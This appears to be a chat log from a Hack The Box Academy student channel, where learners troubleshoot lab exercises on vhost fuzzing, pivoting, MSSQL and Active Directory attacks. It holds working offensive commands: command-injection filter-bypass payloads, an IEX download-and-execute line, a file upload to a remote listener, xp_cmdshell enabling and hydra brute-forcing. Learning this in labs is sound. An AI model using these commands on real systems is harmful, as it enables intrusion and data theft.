#modules
I guess it makes me feel insecure because it's so alien I wonder if I need to take a class on it to be able to use it in an offensive context.
Mssql is just ______
Is knowing a dozen commands enough?
ok it's giving me the apache webpage so it's not working
select * from [table] where [column name] = '<query>'
so your filter is wrong
all you need to find the information is given in the section
there's a bash loop with curl they use; you only really need to loop it for a minute to see what the filter should be
note you might need to add -E to the echo portions
as sometimes it doesn't do the newline thing
or something like \\n might work
Sql
To start bug bounty, is there any prerequisite?
What about GO?
And also, how do I show all databases?
Already I'm learning in infosec foundation
select name from sys.databases;
You're awesome
it's literally in the Footprinting module ¯\_(ツ)_/¯
and expanded on in the Attacking Common Services module
.
that's what i hate about mssql. that there
information security foundations path can be considered a pre-req path
list databases is such a beauty
So that means I'm in the right place
though i think depending on the tool used there might be some internal commands specific to the tool that makes enumeration easier
yes, i believe it covers all the minimum info needed
After I can learn pentesting or bug bounty
yep
depends what interests you more
BB is web domain stuff, Pentesting is Active Directory/networked environments
I will do pentesting and bug bounty
It will be Pentesting web
is that great
"Pentesting Web" that's not how that works
Pentesting, in this context, solely refers to exploiting a vulnerable server to obtain and pwn a domain
with Bug Bounty the focus is SOLELY on just finding and exploiting with no major system compromise (except maybe exposed files through LFI/RFI/etc)
btw anyone has seen the senior web penetration testing content. How is it compared with Portswigger?
Yes, most of the time in actual bug bounties they don't want you utilizing the vulnerability fully.
So there is no relative thing in pentesting bug bounty
Bug Bounty and Pentesting are two separate things
Yes.
I changed my command to this and it's still not working:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo -E "\\n********\nFUZZING: ${vhost}\\n********";curl -s -I http://10.129.89.192 -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: ";done
I knew, but why I said pentesting web is cause it's like bug bounty
try using the domain instead of the IP
Just run ffuf, look at the response size in the errors, ctrl+c, then change your -fs to the size
that too
it's not
web app pentesting is a thing. the bug bounty hunter job role path is a great foundation for web app pentesting if you want to go that route. but web app pentesting is not the same thing as bug bounty hunting.
^
Really thinks that look very better
would you say CWEE would also build on that or no
What's different between bug bounty and pentesting web
Web App Pentesting though is something you're hired for
haven't taken either. but i assume yes
Bug Bounties are just public bounties to find security vulnerabilities in a webapp
also often with Web App Pentesting you're given the source code
I need to know what's different between bug bounty and web pentesting
i'm on the 1st AD skills assessment. I need to access a mssql instance that is only available through the network of the host I own.
i used chisel to open a socks5 tunnel
./chisel server -v -p 1234 --socks (attack)
.\7zip.exe client -v 10.10.16.41:1234 socks (target)
then put this line in my /etc/proxychains.conf
socks5 127.0.0.1 1080
in the output of the client, i can see it's pointing 127.0.0.1:1080 to my socks tunnel but when i run proxychains nmap -sT -F on the hosts I found through a ping sweep I get connection refused. I also just tried running mssqlclient with the creds but still nothing.
Fixed by using meterpreter routing & socks proxy. After cracking svc_sql pass don't let the 1433 port in the question confuse you, you need to rdp into MS01.
@fathom pendant
i haven't touched either so i don't know
This is gonna be mad fun when I know what I'm doing
what is your speciality? if you dont mind telling
Plot Twist: it won't
don't worry
tfw syntax error
i can safely say that i had a very bad time on this week's box
mfw the documentation for this api is out of date
@fathom pendant
instead of ipaddress, you type ipadress
what?
don't just ping me without having a question
or responding to something
is this the right command:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 10198
why don't you run it and find out
¯\_(ツ)_/¯
remember: try first - ask if failed
It broke everything, I have no more computer
skill issue
Fr…
Look, my question is the difference between bug bounty and web pentesting
Utilize Google
I did and it's not getting me the results
have patience
Does gpt help
gpt isn't a search engine
I mean for troubleshooting
do the same thing you did that got you the first set of results
except with this new filter
Is Ai
that's the only thing you change
same message applies
Try stuff until it works
GPT can be wrong
I am trying this because I found a hidden page but it gives me apache:
curl -s http://10.129.89.192 -H "Host: hidden.inlanefreight.htb"
that's my thing
and if it's broken, you don't wanna Fubar it
apache is wrong page
I know
pentesting in web means that
Implement vulnerability, I'm right?
USE. GOOGLE
if the vhost isn't in your /etc/hosts file then it's going to bring up the apache page
i don't recall having this issue but i could be wrong
but i don't recall -hidden- being one of the vhosts
If I learned two bug bounty and pentesting it will be great thing for two certifications
the pentesting cert from HTB does not assist with web app pentesting
it is a completely separate topic
i believe it's because he's going to the IP instead of the hostname, so he'll need the hostname in /etc/hosts and then to navigate there
my command uses curl http://ip -H "Host: ${subd}.inlanefreight.htb" (i used a for loop to iterate through all the found subdomains and output it to a file
yeah but he's saying when he visits the site it's just the default apache page
well if he's visiting a bad webpage that doesn't contain the flag
then yeah it's gonna be the apache page
if the IP is hosting multiple subdomains, visiting the IP is just going to bring up apache instead of the virtual site
he's using curl
ahh yeah good point
i'm reading it as "the curl result is giving the apache default page"
not "i'm visiting this in browser and getting the apache page"
Guys! Please... Command injections, skill assessment. I am trying to ...
you might want to remove that as it may be considered spoilers (gives the injection point away)
What am i doing wrong in this live? I have already found execution point but this... makes me wanna cry
i will, after few minutes
can i do like that?
i would simplify your payload, yours looks pretty complicated and the filter isn't that crazy
ur doing too much i did not do all dat shit
use mv command in linux and put ur payload in there. see if it works. even if it does you need to break ur payload up line by line and compare with ur notes
I tried mv command: Permission denied
I can't break out of inlined command
can confirm: h* is not a valid subdomain for that section
as I didn't add anything to my /etc/hosts and was able to visit a valid answer subdomain with the right Host header
i figured he was using it as a placeholder to not spoil
u got to read something ur user can access
use an environment variable for the semicolon.
practice ur payload locally, make sure ur reading from a directory u can access of course
my favorite thing about this section is that flag 3 has l3375p34k flag_four in it
really makes people think
Somebody knows how i can download ysoserial
I have tried many variations on the same command and it's some version of this:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo -E "\\n********\\nFUZZING: ${vhost}\\n********";curl -s -I http://FUZZ.inlanefreight.htb -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: ";done
It's not getting me the results tho. I also try variations on this:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918
It's not giving me any flags. I am trying all sorts of URLs with variations of this:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ curl -s http://10.129.89.192 -H "Host: buggalo.inlanefreight.htb"
I don't get it
are you getting subdomains returned?
yes
so the command is working..
ok
what section are you on
I could use some help on "Active Directory Trust Attacks" - "Skill Assessment", question 2. I'll explain what I have tried so far.
so what's the issue then? the command worked and showed you the vhost
the first command here doesn't make sense; the second should give something
ok
let me change the first command then thank you for pointing me in the right direction
you don't need to do that, you said you got the vhost results from ffuf already
you're just going to enumerate the same thing
running the second command gave me a proper set of vhosts
then how do I get the right vhost? at this point trial and error?
because I have tried dozens of vhosts
if you got a valid list of subdomains, you can use the curl command on the subdomain to get the flags there
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
this downloads to memory executes PSUpload.ps1
which means this command can be run
Ok thanks
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
But I thought I was doing that
because Invoke-Fileupload is a function in my session now
And it gave me apache
this works i tested it. But what didn't work was downloading the powershell script
and executing locally like this .\PSUpload.ps1
you initially had a wrong list
because your initial fs was wrong
the new fs in your ffuf command is correct and should yield results
also ffuf likes to be funky if not in fullscreen
this payload works locally ||'&sh&c'p'${IFS}${PATH:0:1}flag.txt${IFS}${PATH:0:1}var${PATH:0:1}www${PATH:0:1}html${PATH:0:1}files${PATH:0:1}tmp${PATH:0:1}flag.txt'||
Am i overcomplicating again?
no, but your command looks strange. why are you copying a file to a random dir that may or may not exist instead of just reading the flag
So it tells that vulnerability for pentesting
How to see vulnerability and check it that pentesting
But the bug bounty report the bug
you report a bug/vulnerability you find
not random, it is shown on website, but it is not viewing anything either
don't
lmao
Probe mean scan the app right
i'm already on low enough patience lol
it means following whatever methodology you've built and researching
i bet Marcie woulda been done with pentester's path a month ago if they weren't in this channel
We will learn the pentesting and we know about it
if i wasn't on the brink of homelessness for a few months :):):)
And I love the bug bounty
I spent a solid 4 months without internet even, probably longer
and let me tell ya, tethering and trying to do HTB academy is NOT fun
saw one guy in here doing the path on his phone
With the pentesting
Because I love pentesting
You don't know anything about it, how can you love it lol
I will tell you
don't
i am at 80 percents, currently, if someone is interested
and my challenge is to finish it till 10 of the May
The thing is test the vulnerability and check it if it cable for hacking
I don't care anymore
I will learn about whatever it takes
because you have to import it
ah
PSUpload is a powershell module, not an executable
that IEX command does import it btw
does it? i didn't read
yh this is my ignorance of powershell
||'&sh&cat${IFS}${PATH:0:1}flag.txt'|| the only question is how can i see the output...
yeah it downloads and imports it into the current session
so actually if i have the module as a file locally i would run IEX to import the module also?
then they just need to invoke it properly
No, if you transferred the file locally then you'd need to import it into your session
ok i see
the IEX command downloads AND imports it
many of the modules will have a c:\tools folder with various powershell scripts, if that's the case you can simply import the file
i guess
I don't think you're going to see the output using the & operator
i need a crash course in pshell
if it's imported then you just need to use Invoke-Fileupload
I believe one of the first pages in the module goes over each operator
https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1 btw i just read this to figure it out
yup, but will | be displayed properly? There is nothing displayed
The Get-Command cmdlet gets all commands that are installed on the computer, including cmdlets, aliases, functions, filters, scripts, and applications. Get-Command gets the commands from PowerShell modules and commands that were imported from other sessions. To get only commands that have been imported into the current session, use the ListImpor...
I would have to see your payload, i was able to use the & operator and it displayed the info
it will be useful. it's just that i know practically nothing
not going to work like that
now?
you can DM me so you don't have the post that here
thx!
I get a list of subdomains but I don't see how I am supposed to pick out right subdomain:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo "\\n********\\nFUZZING: ${vhost}\\n********";curl -s -I http://10.129.89.192 -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: ";done
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ curl -s http://10.129.89.192 -H "Host: classifieds.inlanefreight.htb"
there are only 6 subdomains that should return for the vhost
the second command will NOT return any useful information aside from the content length to filter with ffuf
again i can confirm that the wordlist and your ffuf command should be correct
so either your host silently died on you or something is wrong as I literally just sanity checked this
I'm somewhat new here, which channel can I talk about the Pro Labs?
#prolabs-[insert prolab name] you need to read and follow #welcome to be able to access them
I purchased the annual gold plan for the benefit of the solution assistance, but I am not seeing any modules that have this feature. Do I need to wait a certain time for it to activate or should it be instant?
I believe you enable it in settings
Ah! Thanks. I will check it out.
For the sake of learning, I suggest avoiding it. As the plaintext solution isn't obfuscated or hidden in any way
You can literally just go through, find the answer, and copy/paste without touching the box
They didn't do any QA on the feature
Tier 0 modules go brrr
even
Also some modules are relatively easier than others
It's been very helpful for me. If you don't have a of time especially. You do need to push yourself and use it as a last resort but... Yeah it's solid.
not impossible ¯\_(ツ)_/¯
They just missed the mark on it for me. Imo
maybe , if you already know the content so you just work on challs
I'm not as good as you are with things I've never been exposed to before.
I would prefer it to be a collapsible list of steps
The whole dial into MSSQL via PS...I would not have figured that out.
It's explained to you in the module
¯\_(ツ)_/¯
The Common Services module...?!
I didn't see it in there.
I kept looking for that and couldn't find the page. Where do you see the students of the month?
I got an email
dang. i completed like 25 modules in a month and didn't get an email
and i'm out of modules lol
you got an email of the summary of months like what modules are released , what's the upcoming events , what's articles was published ....
no, i didn't get that email
maybe you need to subscribe somewhere idr
Hell yeah bro!
KangZ!
it was a grind lol
Yep, read the sql section carefully
Alright, I searched for it and couldn't find it. I'll take a closer look.
@valid viper
It happens. I'm having to finish the course while starting a new job and planning a move. I was bound to miss something.
Take it slow
MSSQL though, ugh.
I'll go as slow as I can afford to. I need to get on with Synack.
ACK
I'm sick of sysadmin.
I did a blue team ticket today and then the security guy says 'No, don't look at the logs on the endpoint. That's my job.'
I need six months with Synack and a CVE.
Then I'll be ready to handle my action.
i mean I'd think part of sysadmin would be security, or at least understanding what may have tripped something ¯\_(ツ)_/¯
lmao my last job told me "security has nothing to do with your job"
it was their way of saying they didn't want to pay for certs
i just mean looking at a log that tripped because of a service account you set up sounds like your job 
I knew what it was, and I investigated most of it. But he wouldn't let me finish.
sounds like he just has a stick up his ass
did you at least pass the info you found off to him?
Yes.
he should have been faster at his job to grab his ticket ¯\_(ツ)_/¯
Well no it was my ticket.
like assigned to you?
That was the thing :/
not just you plucked it from the pool?
Basically. There's no dispatcher.
i'd go to your manager tbh
Yeah they say they need a better SOP.
Honestly sounds like simple ticket delegation as well
that way sysadmin doesn't get a security ticket
i.e. a flag system that sorts it into a bucket
It was a fraudulent email.
It was neat because it originated internally, but no rogue logins.
None of that exists at my MSP.
Nope.
spoof
We checked the headers.
¯\_(ツ)_/¯
if it's a well enough spoof then it's not gonna be noticeable easily
Possibly a spoof, but I doubt it. Apparently this has happened with this person 3 times before.
sounds like mr log checker didn't do his job the first 2 times then
well then could be a compromised host
Bro he didn't even check the scan I don't think.
This is my suspicion. But they wouldn't let me check the logs.
¯\_(ツ)_/¯
sounds like BEC
BEC?
BEC = business email compromise
AH
Nothing showed up in Entra or Exchange.
anyway; this is veering far off-topic
you should verify your account so you can hang out in the brainrot that is #general
Anonymity is everything.
yeah but the brainrot is fun
and allows you to take part in more off-topic conversations
Sorry. I'll go back to /b/
Which number are they expecting? I thought it was the count for DELETE FILES
When did they add walkthroughs on the modules?
For the end of section questions?
I don't know how I was supposed to figure out the FILE PREVENTION INCLUSION section's second question without it. So much detail in there that wasn't in the module! Thanks HTB!
Honestly way better than the previous option.
Oh weird, I must only be getting notifications for the overall HTB Discord announcements!
according to Pedant from my recent feedback on a walkthrough: a lot of the stuff is also assuming pre-existing knowledge from a pre-req module to them
so while it may not have been directly in the module it's assumed you should have known from somewhere
I guess I missed the part on the php.ini file. I was searching for "system()" not "disable_functions"
What is the difference between "view page source" and the page source code?
Looking at the Source Code Disclosure section of the PHP filters section, seems like there's no need to get base64 encoded source code if you can just right click and pull the source code
Is this HTML vs PHP source code?
i think source code dives into the actual code of the page
i.e. the backend api
whereas page source is just "hi this is the page you're looking at"
page source is whatever is rendered to you. source code contains what you see and all the backend logic
general rule of thumb
ah so i was fairly close
Cool, thanks @dim wolf and @fathom pendant
but the AD enum module is CHONKY
because it's building off basic AD knowledge and going "hey look at this cool thing"
So is some of the source code PHP and some HTML in that case, or is it just "hidden" HTML on top of the HTML?
"wait you can do that?" has been said by me many times
HTML on top of HTML
it's just turtles all the way down
you will not see any PHP in a page source
usually a reference maybe
all of that is handled by the backend
and if there is it's what marcie said
or it's commented out
but even then that's hidden in the comment tags or buried
best way to know what is on the backend: dev-tools -> network tab -> load page
I'll have to brush up on my HTML structure then, I don't quite understand how the HTML nests
I know it's not something I necessarily need 100% but I hate not knowing how things like that work
It's frustrating
interact with something; see the call -> hey it looks like there's <codebase> on the backend
often if there's a backend involved it's done on the Config level
there's front end and back end. it's what you see, vs what the server is doing. when you right click and "view source" you only see what your browser sees, you don't see the back end logic
so what do I do differently about the second command?
not running it
you have all the information you need to feed to ffuf
ok
the second command is purely an information gathering command
I thought I was running ffuf. Ok got it.
the second command i referred to was the loop command
ok
ok I completed the whole module
I was catting out the wrong file. I managed to get the right file to cat out.
worked great. I am now on next section.
in the pivoting module. it says Downloading Payload from Windows Target
We can download this backupscript.exe from the Windows host via a web browser or the PowerShell cmdlet Invoke-WebRequest. rdp port is not open on inside ip. where to execute this?
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
FOOTPRINTING > Footprinting Lab - Easy
can someone hint me regarding this module
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
i tried ftp but i face into this.
ftp> ls -R
229 Entering Extended Passive Mode (|||19187|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
Then, can't do much
use ls only or ls -a
ls -la*
enumerate all brother.
read the synopsis carefully
also enumeration is the key, which is the point of the module
enumerate, iterate, repeat
it's a few steps once you see everything
it might also help to be on the right port as well
i hope you scanned
@fathom pendant
got it nvm
ssh might work brother
Marcie, out of the blue quick question: What is your personal reflection of the Documentation & Reporting Module? Wanted to share opinions briefly
thnk got it.
thanks.
haven't done it
i've been putting my progress on the side rn
does anyone else ever not understand anything until they actually try it
like you'll read a module about something and it's just words but it makes perfect sense when you do the examples
is this normal
apparently that's what being a hands-on learner is.
"what does this complex string of commands do... oh"
Hmmm... More like fire fire fire... water hose, fire, water hose water hose water hose water hose water hose water hose water hose water hose water hose..... fire.
some advice; break the command down into its components and run it down one portion at a time if it's
command1 | command2 | command3 | ...
like idk i'm just reading about active directory and none of it makes sense yet because they're just saying stuff like "thing x is maintained by thing y" but they don't tell me what thing x or thing y are
and if you're confused by a certain option: man <command> or <command> -h/--help
oh in powershell
actually it's usually not commands, it's usually theory i have trouble reading through
Get-Help
i believe it's Get-Help <command> or something like that
no the commands and stuff are what i'm actually good at understanding
ah so why does this work
yeah kinda
I wouldn't mind try to work on my communication and recollection skills tomorrow/over the weekend if we have some time.
I could use the practice. It wouldn't be 100% fool proof
more just like definition after definition and the definitions contain definitions that they never defined
more like 65% confidence, the rest researching, standard pentest process, etc
a lot of what drives powershell is just xml
pretty much most powershell output is xml
no not powershell i'm actually pretty good at powershell
Oh? That just became a little interesting
yeah, event logs? just fancy xml
pretty much
powershell is just really efficient at sorting xml
the practical stuff like learning commands are the stuff i'm good at
it's just a ton of definitions and stuff
but nothing wrong with doing external research if something just doesn't click
yeah i've been doing a lot of that
^^^^^^^^^
i've found the microsoft docs usually do a way better job at explaining AD stuff than hackthebox
HTB does tend to introduce concepts but don't fully define them (and then in a later module, they're defined really well)
Intro to AD?
yep
i wouldn't worry too much about it
I've had a hit/miss relationship with Microsoft, but I'd agree, most AD information is decent.
the real meat and potatoes of it is in the AD enum and attacks module
^^
the intro is just to give a broad overview of AD
ok yeah i figured they would start being more specific about this stuff once the time comes to actually start using it
that is reassuring
AD enum and attacks actually dives into some more stuff like Domains and Domain trusts within Forests
literally like 3 sections in the AD enum module is dedicated to talking about inter-domain trusts
i've heard HTB has some seriously Big Boy AD modules
potato heh
36
potatoes are juicy
@fathom pendant Lmao
AD enum and attacks is the biggest HTB academy module
yeah and only like one or two were just "short" definitions
everything else had some practical element to practice with it
ldap query? it's got you covered
We love Ldap! My bad, lmao
ok perfect because that's how i learn
like just reading how to do stuff doesn't do shit for me i have to actually do it
also it's layered in a way of: footprinting, enumeration, attacking, lateral/vertical movement, domain elevation
also pivoting can play a huge role (at least for the exam)
and the whole AD enum module is one large inter-connected lab
so saving creds is really helpful
four password spraying sections and four attacking trusts sections
and don't forget the new entire module on attacking trusts
(you can even sniff out creds/hashes for later sections)
You just gave me an idea that I really like the thought of. Oddly, thanks!
Gonna go write it down 
i write down everything i learn and all the steps and answers to the example questions and flags if that's what you meant
the module will sometimes provide/expect you to connect to a joined attack box
i just mean user:password combinations
having a file for those is helpful
hashcat has an output mode (-o) that you can save cracked files to
if it's something i do or come across during a lab i write it down
but mayhaps i'll make a separate file for those
it definitely helps so you don't gotta look through buried notes 
oh you wrote it down 12 hours ago in the middle of this WALL OF TEXT
lmao
yeah my obsidian notes are hyper organized specifically to avoid that exact problem
also another module to be wary of reused passwords throughout is the Password attacks module, there are 2 hosts, linux and windows the linux ones are all inter-connected and the windows are all inter-connected
noted!
oh i save the creds directly in my vm as a file
that way I don't gotta tab out for it
i personally can't stand using vms
while it is against ToS to target other academy users, it can still happen
i talked to a bunch of people and they said they've never heard of that happening and that's pretty much just there for legal reasons
well yeah
it almost never happens but it's more of a habit forming thing than anything
I'd rather not expose my direct system to a vm
and having my notes saved on a "separate" drive to my vm/work helps in case I have to reinstall
so i don't lose notes
yeah i have a plugin that backs up my notes to dropbox automatically
i mean if i'm ever planning on entering an actual corporate environment or working with malware or something then i'm going to use a vm but right now it's pretty low on my priority list
but if your setup works for you then I can't really force you to use a vm ¯\_(ツ)_/¯
and yeah; working with malware it's an absolute must you either A work on a VM or B work on a sacrificial lamb computer that's not connected to a network
A VM is better as you can easily restart a vm from a snapshot if you goof and the malware bricks it
yeah no chance i'm working with malware on a production pc
i have almost no problem switching to a vm as long as there's some way i can relatively easily just transfer all of the tools and shit i have installed from my ssd to a vm
also the CDSA labs i believe are working with pre-sampled/logged malware or very safe PoC
and i haven't really taken the time to figure out the easiest way to do it
like if i could just sudo cp / [???]
i guess i could probably set up a shared folder
apt list --installed | grep -v "Listing" > installed.list
and I've had relative success at least just copying my /home/user folder to new installs
and just doing the minor setup for other stuff
yeah i mean i have almost nothing saved in my home directory
besides documents, pretty much everything is empty
if you're telling me you run around your system as root, we are no longer friends /hj
i do not for the record
i just don't have a lot of stuff installed on here
like i have a ton of tools and notes but that's it
but in reality it's not much, just identify the important config files that you absolutely need if you really have to
but as far as copying the whole of / i'm unsure how that would work migrating to a vm
ik virtualbox has a file manager thing to where you can copy things over
yeah that and i could always just do a shared folder
i generally don't share folders between host/vm ¯\_(ツ)_/¯
hmmm
but using dropbox, like you do for backups, sounds like a happy medium
that could work
in theory though you should be able to drop the files right into /
surprisingly my entire root directory is only 54gb
and since it's a VM, no harm no foul
true
can you use a flash drive with a vm
like if i plug a flash drive into my computer will it show up in a vm
that's another option
surely there's a way to do that
let's find out
oh yep it's possible
maybe i'll just get a 64gb flash drive or something
this doesn't sound so bad
└─$ python /usr/share/doc/python3-impacket/examples/mssqlclient.py damundsen@10.129.243.57 -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 94, in <module>
ms_sql.connect()
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 538, in connect
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused
Authenticate to 10.129.243.57 with user "damundsen" and password "SQL1234!"
Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
Active Directory Enumeration & Attacks
Privileged Access
Why won't it let me use mssqlclient.py on it?
it says in your error message
is mssql running on that host?
remember you're in a domain environment, there's likely a dedicated SQL server
(it also shows in the example command)
this is assuming you have either a pivot on the network OR are connected to the provided attack host
the attack host is the same as from the previous section
again, never make assumptions
also it says it RIGHT THERE in the question
not even that; the question directly says where to connect to
also the flag for this answer might make you chuckle
i c, ok, thanks also
Tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance "ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
VERBOSE: ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433 : Connection Failed.
PS C:\Tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance "ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
VERBOSE: ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433 : Connection Failed.
PS C:\Tools\PowerUpSQL>
ComputerName : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL
Instance : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433
DomainAccountSid : 1500000521000170152142291832437223174127203170152400
DomainAccount : damundsen
DomainAccountCn : Dana Amundsen
Service : MSSQLSvc
Spn : MSSQLSvc/ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL:1433
LastLogon : 4/10/2022 3:50 PM
Description :
why did it fail?
just connect to the attack host (172.16.5.225) and connect with mssqlclient.py there
nope
there's a provided linux host on 172.16.5.225
see the previous section for credentials
yes this attack host is persistent throughout the module
pl damle
also
you can just use the IP,PORT as the instance name
it's also likely not ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL just ACADEMY-EA-DB01
ok thanks
also, for the love of god
please just fucking wrap large blocks of text in ```
so it's more easily readable
will do in future also
┌──(am㉿kali)-[~]
└─$ ping 172.16.5.225
PING 172.16.5.225 (172.16.5.225) 56(84) bytes of data.
dat no work..
ohh i c
you don't have access to that subnet without a pivot
thanks
pl damle
no idea what thwat means
ok thanks
I highly suggest learning how to read and interpret errors and stuff like that
it will be highly useful to your future in this course
and for the exam
u r right, thanks for all ur help and advice so far
this is not the first time that you've had to be told to just read
I also suggest you learn what subnetting is and how subnets work because it's somewhat clear that you just don't know or have forgotten
Perform dynamic analysis.
wget is an alias of Invoke-WebRequest, so you have to use the following syntax:
iwr -Uri http://<your-box>/additional_samples -OutFile samples.zip
Does the shellcode like similar to the one in the section?
If yes, then did you remove all whitespaces?
trace the function one by one slowly.
My bad
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
i got a answer 37 but it is showing wrong answer
can anybody help me out
Hi everyone! I've managed to login as larry in the whitebox attacks skills assessment, but am unable to escalate to admin. Any help would be greatly appreciated
yooo lets go im finally doing an Easy difficulty instead of Fundamentals
the progress is crazy
Hi I am doing the Password Mutation exercise and I have mutated the password list given in the Resources using the custom.rule provided. To speed up the process, I split up the mutated passwords into 20 smaller chunks. I brute-forced using hydra on FTP service all the passwords but no valid passwords were found. What am I missing?
i don't recommend chunking up the mutated list
it's definitely in the mutated list so maybe you didn't mutate correctly
while it may seem more efficient - it's not
also use the custom.rule from the Resources, not the crappy rule list they have you write
I am using the custom.rule from the Resources section.
Why not? Let's say that the password is somewhere in the middle or end of the mutated list, then by chunking, I am checking those passwords simultaneously making the bruteforcing more efficient.
if you're bruteforcing the same service with too many threads at the same time it'll drop
so you'll miss it entirely
and in the end you spend more time troubleshooting why it didn't work
running the full list will take around 20-30 minutes with 48 threads
iirc you can cut like the first 17k pw for this one
hydra -l sam -P chunked_password0.list ftp://{server_ip} -t 64
64 also tends to skip the result
Why?
48 is the most stable from what i've seen and experienced
But why?
as said earlier: too many threads hitting it at once
so the process and thread that might have the pw will drop it
due to it not being able to connect
because the port temporarily closes itself due to congestion
How do we know that the optimal number of threads is 48, and not less not more?
Will this apply when performing real world penetration testing or just the HTB labs?
but more often than not, i've gotten a fail on 64 but a success on 48
on a rl application you'd be using far less threads
default for ftp is 16
Like how many?
if youre trying to not generate lots of noise also
and trying not to accidentally DOS
you're 100% gonna get noticed if you accidentally DOS when an automated service suddenly can't do its thing, i.e. send a backup to FTP
I agree with Marcie, aim for stability against the service so you can give it time to open and close connections
generally you can just wait it out for it to restart itself, if you're lucky which is generally after a minute or so, but you're not getting those dropped packets back
so you won't know where the potential success/fail is
So, how do I determine the optimal number of threads?
trial and error i would say
in this case; many other people have experienced the pain
just like marcie has done
so we can shed the light onto others - that 48 is the magic number
you can maybe get away in the 50s
but i like going by 16
64 didn't work, drop to 48
If I do not already know the password, how can I do trial and error?
observe the packets
In this particular exercise, yes. But in other scenarios?
hydra has a verbose mode
you're basically DoSing the service if you hammer it too much. you're overwhelming it with data it can't process in time.
in other scenarios; if you're attacking the same target you can generally apply same rules
if a low number works try not to go too much higher
in an rl scenario you work bottom up; and in an rl engagement USUALLY it's written within the Rules of Engagement to try not to DoS their infra
You are brute forcing FTP right?
Yup
sometimes they'll even tell you what to avoid bruteforcing altogether
the password is trivial, we're talking about sending packets to a service that cannot handle the requests
and I get wanting to understand the methodology of "but how would we figure it out"
in an rl scenario we just let hydra run its defaults
because you're not on any kind of timer
in terms of target being up or server time for your machine
so you can leave a bruteforce overnight while you sleep
While you play ASMR music in the background and wake up to a successful password finding
Hey in the Remote/Reverse Port Forwarding with SSH. how do i do following "We can download this backupscript.exe from the Windows host via a web browser or the PowerShell cmdlet Invoke-WebRequest.
Remote/Reverse Port Forwarding with SSH
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" . how can i do it with ssh. this command is not working
Thank you all for the great insights!
"this command is not working" isn't really descriptive
i take it you have a port forward listening on 8123 to point back to your localhost webserver port to transfer the file?
when you ssh into a windows machine usually it's already running powershell
if you see PS in front of the CWD> then congrats, powershell
if not then just type "Powershell"
and voila, you're dropped into a powershell session
it's really as simple as that
just remember, these are isolated machines that we can beat up all we want so we can develop a proper methodology
doing the pivoting module. i can use the ubuntu server that pivots to windows machine
What command will print my current working directory onto the console?
whaaaat
ls and dir do show the directory but not exactly what its looking for
kinda lost here
pwd
oh shit
print working directory
Footprinting Lab - Hard
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
I have access to tom details already, but am lost what next.
but its incorrect
it's always a good idea to see what a user was doing when you get access to the user
Poor security practices for Tom 
holy shit it was cd
**c**hange **d**irectory
